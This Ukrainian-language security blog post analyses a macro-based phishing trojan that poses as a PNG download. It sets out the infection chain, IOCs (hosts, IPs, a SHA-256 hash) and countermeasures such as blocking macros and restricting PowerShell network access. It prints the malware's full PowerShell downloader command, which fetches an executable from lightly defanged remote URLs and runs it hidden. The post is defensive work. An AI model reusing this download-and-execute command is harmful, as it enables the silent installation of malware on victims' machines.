IOC_trojan_240817

Доброго дня, панове.

24го числа на аналіз було надано два зразки шкідливого коду, які проходили по двом різним розсилкам.

Не дивлячись на те, що подібні схеми атаки вже висвітлювалися неодноразово, було прийняте рішення описати їх роботу повторно.

Будь ласка, зверніть увагу на початкові кроки компрометації та переконайтеся, що ви дійсно вжили заходів, аби на ваших системах такий код не запустився.

Отже зразок 2й, типовий trojan.

Рівень загрози – середній. Для організацій, що прислухалися до рекомендацій у попередніх повідомленнях – низький.

Важливий момент зазвичай основне тіло (exe) завантажується із вказаної у приманці адреси як Content-type:application/binary або Content-type:text/plain,

тут же ми бачимо завантаження шкідливого коду у вигляді Content-Type: image/png

Приклад фішингового листа:

Схема атаки:

email > attach (DOC) > macro > cmd > PowerShell > URL > HTTP GET > %temp%\*.exe > AppData\Roaming\winapp\*.exe

Активність скомпрометованої системи:

#1 Якщо жертва відкриває приєднаний документ, відбувається активація макросу який у свою чергу ініціює завантаження основного тіла через powershell (тип доставки W97M/Downloader)

cmd /c PowerShell "'PowerShell ""function fitt([String] $argu){(New-Object System.Net.WebClient).DownloadFile($argu,''%TMP%\Bctxt.exe'');Start-Process ''%TMP%\Bctxt.exe'';}
try{fitt(''h11p://esp.jp/sran.png'')}catch{fitt(''h11p://enyahoikuen.com/sran.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Nuxix.bat;Start-Process '%TMP%\Nuxix.bat' -WindowStyle Hidden"
121.50.42.51 HTTP      GET /sran.png HTTP/1.1

#2 Основне тіло завантажується в форматі зображення та записується на диск у вигляді запускного файлу:

File name sran.png      >>  %TMP%\Bctxt.exe
File size 500.5 KB
SHA-256 2e7dc1ea8d67bd8b879a2c17ddfa1a5ee1dfb3f0b01491635d598a027ff5fac8

#3 Поведінка основного тіла

Дублює своє тіло у каталог AppData\Roaming\winapp\*.exe

Здійснює перевірку зовнішньої IP адреси:

146.255.36.1 HTTP       243 GET /plain HTTP/1.1

Додає себе у автозавантаження через планувальник.

Ініціює запуск кількох дочірніх процесів svchost.exe через які здійснює комунікації із наступними хостами:

188.165.62.46:443
62.140.236.170:80
149.56.167.227:443

А тепер увага – найголовніше, заради чого я це пишу:

Що можна було зробити аби уникнути інфікування?

  1. Доставку приєднання із макросом можна було зупинити через карантин файлів з макросами на рівні поштового шлюзу (як приклад через Email Gateway)
  2. Запуск макросу можна було заборонити через блокування макросів у параметрах пакету MS Office (групові політики)
  3. Завантаження основного тіла шкідливого коду можна було уникнути заборонивши мережеві з’єднання для процесу PowerShell (одне правило вбудованого брандмауера)
  4. Або ж завантаження запускних файлів можна було заблокувати на рівні proxy (аналіз пакетів та пошук рідка “This program cannot be run in DOS mode“)
  5. Або ж можна було б заборонити виконання команд PowerShell із параметром -WindowStyle Hidden (Endpoint Security Adaptive Threat Protection, DAC)
  6. Запис на диск та запуск основного тіла можна було заборонити блокуванням створення .exe файлів у каталозі профілю (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5-6 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

h11p://esp.jp/sran.png            (121.50.42.51)
h11p://enyahoikuen.com/sran.png   (202.231.207.151)
121.50.42.51 HTTP   GET /sran.png   - завантаження основного тіла
146.255.36.1 HTTP   GET /plain   - перевірка зовнішньої адреси

Контрзаходи:
  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блок запуску макросів через параметри пакету MS Office
  • Блокування доступу PowerShell.exe до мережі Інтернет
  • Заборона створення та зчитування/запуску *.exe з каталогів профілю користувача %appdata% та %temp% (якщо нестандартний шлях)
  • Жорстка фільтрація каналів доставки із перевіркою репутації як посилань так і самих файлів (MWG, MEG + GTI)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: